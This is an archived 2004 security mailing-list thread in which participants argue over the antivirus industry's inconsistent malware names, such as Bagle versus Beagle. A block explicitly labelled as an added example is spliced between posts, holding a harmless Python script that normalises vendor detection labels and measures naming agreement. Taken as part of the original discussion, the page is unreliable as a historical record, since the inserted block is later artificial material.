Re: (no subject) [In reply to]

On Tue, 10 Aug 2004 02:02:23 EDT, Todd Burroughs said:

> No shit. They should at least get together and come up with some common
> naming convention. They need to make some common "naming authority", it's
> not difficult, we do it all the time with other software and as mentioned,
> in all scientific disciplines.

Software gets named over days/weeks. They crank out a new name for an element
every few years. These things need names in *MINUTES* - often while the various
A/V companies are looking at different copies of a polymorphic, multi-attack
piece of malware.

5 blind men and an elephant time... and you want them to agree on a name before
they even agree they're looking at the same thing???


frank at knobbe

Aug 10, 2004, 8:13 AM

Post #72 of 181 (4417 views)
Permalink
Re: (no subject) [In reply to]

On Tue, 2004-08-10 at 09:47, Valdis.Kletnieks [at] vt wrote:
> Software gets named over days/weeks. They crank out a new name for an element
> every few years. These things need names in *MINUTES* - often while the various
> A/V companies are looking at different copies of a polymorphic, multi-attack
> piece of malware.

Hey, I didn't say it would be easy, did I?

> 5 blind men and an elephant time... and you want them to agree on a name before
> they even agree they're looking at the same thing???

Obviously not at time of research. But these days everyone is keeping an
ear on the ground... I mean Internet... while they are doing research.
Once one company, which is working on a new strain they term BigNasty,
finds out 3 others are discussing this (on the Internet or private AV
channels) as the SuckThis virus, then they could adopt that name to
avoid confusion.

I didn't say it was easy, but they could at least make an effort.

Here we are a year later and still call it Bagle or Beagle, either one.
I'm still confused if MyDoom-O and MyDoom-M are the same thing or not.

BTW: Perhaps the analogy to medicine was misplaced. I just thought in
terms of diseases. How many different names do we have for ...say...
chicken pox or colitis or diabetes? Imagine you had 5 different names
for the flu. I could come up with a dozen Monty Python sketches taking
place in the doctor's office....

I didn't say it was easy, but we should "encourage" the AV industry to
work towards such a standardization. It may even be beneficial for them.

Sing with me Valdis....
"I say tomato, you say tomato,
I say potato, you say potato,
I say Beagle, you say Bagle,
and others are calling it something else."


Regards,
Frank (throwing rocks at the glass palace)
Attachments: signature.asc (0.18 KB)
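The scan result quoted earlier in the thread, and Frank's suggestion above that vendors could converge on whichever name is already circulating, both come down to the same practical question for a defender: given a dozen vendor labels for one sample, which family name do they actually agree on? The following is an added example, not code from the thread or from any AV vendor, that tokenises the labels exactly as printed in the quoted scan (the archive rewrote "@" as "[at]"; the label is kept that way) and counts the remaining family tokens. The GENERIC word list and the "two characters or fewer is a variant suffix" rule are assumptions of the example; real vendor vocabularies are much larger.

```python
"""Normalise per-vendor detection labels to a family token so that naming
disagreement across AV engines is visible at a glance (added example)."""
import re
from collections import Counter

# Detection labels as quoted in the thread's scan result. "nothing" = no hit.
SCAN_RESULT = {
    "BitDefender": "JS.Dword.dropper",
    "ClamWin": "Trojan.JS.RunMe",
    "eTrustAV-Inoc": "JScript/IE.VM.Exploit",
    "F-Prot": "HTML/ObjData [at] ex",
    "Kaspersky": "nothing",
    "McAfee": "JS/IllWill",
    "NOD32v2": "Win32/Bagle.AI",
    "Norman": "W32/Malware",
    "Panda": "Fichero Sospechoso",
    "Sybari": "JS/IllWill",
    "Symantec": "nothing",
    "TrendMicro": "HTML_BAGLE.AC",
}

# Platform, type and generic tokens that never identify a family. This set is
# an assumption of the example, not any vendor's official vocabulary.
GENERIC = {
    "win32", "w32", "html", "js", "jscript", "script", "trojan", "worm",
    "virus", "malware", "exploit", "dropper", "downloader", "generic",
    "heur", "suspicious", "fichero", "sospechoso", "file",
}


def family_token(label):
    """Return the first label token that is not a platform/type word, a
    short variant suffix (two characters or fewer) or a number; None when
    the engine reported no detection or only generic words."""
    if label.strip().lower() == "nothing":
        return None
    for tok in re.findall(r"[A-Za-z0-9]+", label):
        tok = tok.lower()
        if tok in GENERIC or len(tok) <= 2 or tok.isdigit():
            continue
        return tok
    return None


def normalise(scan):
    """Map vendor -> family token (or None) for a whole scan result."""
    return {vendor: family_token(label) for vendor, label in scan.items()}


def tally(scan):
    """Count how many vendors use each family token (engines with no
    family-level name are excluded)."""
    return Counter(f for f in normalise(scan).values() if f is not None)


def agreement(scan):
    """(most common family, share of family-naming vendors that use it)."""
    counts = tally(scan)
    if not counts:
        return None, 0.0
    family, n = counts.most_common(1)[0]
    return family, n / sum(counts.values())


if __name__ == "__main__":
    for vendor, fam in normalise(SCAN_RESULT).items():
        print(f"{vendor:14} {SCAN_RESULT[vendor]:28} -> {fam}")
    print(tally(SCAN_RESULT).most_common())
    print("top family share: %s %.2f" % agreement(SCAN_RESULT))
```

Run against the quoted scan, only seven of twelve engines produce a family-level token at all, and those seven split two ways at the top (Bagle and IllWill, two vendors each), with three further singletons; the "top family" share is 2/7. That is the bingo card Frank describes, expressed as a number a SOC could track over time or use to decide when a sample needs a human look rather than an automated verdict.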


pauls at utdallas

Aug 10, 2004, 8:20 AM

Post #73 of 181 (4413 views)
Permalink
Re: (no subject) [In reply to]

--On Monday, August 09, 2004 07:06:11 PM -0500 Frank Knobbe
<frank [at] knobbe> wrote:
>
> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? Imagine that were the case in science, particular
> medicine...
>
Getting the AV industry to agree on virus names is about as likely as
getting a government to do anything beneficial for its citizens.

Paul Schmehl (pauls [at] utdallas)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/



Valdis.Kletnieks at vt

Aug 10, 2004, 8:25 AM

Post #74 of 181 (4404 views)
Permalink
Re: (no subject) [In reply to]

On Tue, 10 Aug 2004 10:13:55 CDT, Frank Knobbe said:

> term of diseases. How many different names do we have for ...say...
> chicken pox or colitis or diabetes? Imagine you had 5 different names
> for the flu.

Diabetes comes in Type 1 and Type 2, which are quite different (in one,
your pancreas quits producing insulin, in the other, the insulin is produced, but
not utilized well by your body).

Influenza comes in many different strains as well - in fact, predicting which
strains will be prevalent and should be included in flu shots is a major
challenge. Strains are usually named after the closest major city to the first
known outbreak, although the one that got loose in 1918 is a special case...

As you were saying?


frank at knobbe

Aug 10, 2004, 8:33 AM

Post #75 of 181 (4411 views)
Permalink
Re: (no subject) [In reply to]

On Tue, 2004-08-10 at 10:25, Valdis.Kletnieks [at] vt wrote:
> Diabetes comes in Type 1 and Type 2, which are quite different (in one,
> your pancreas quits producing insulin, in the other, the insulin is produced, but
> not utilized well by your body).

I know, my wife has type 2. They still call it diabetes.

> As you were saying?

If you missed the point, let me repeat it:
"I believe different names for the same virus confuses consumers and
industry alike. I'd like to urge the industry to start adopting a common
naming convention."
Attachments: signature.asc (0.18 KB)
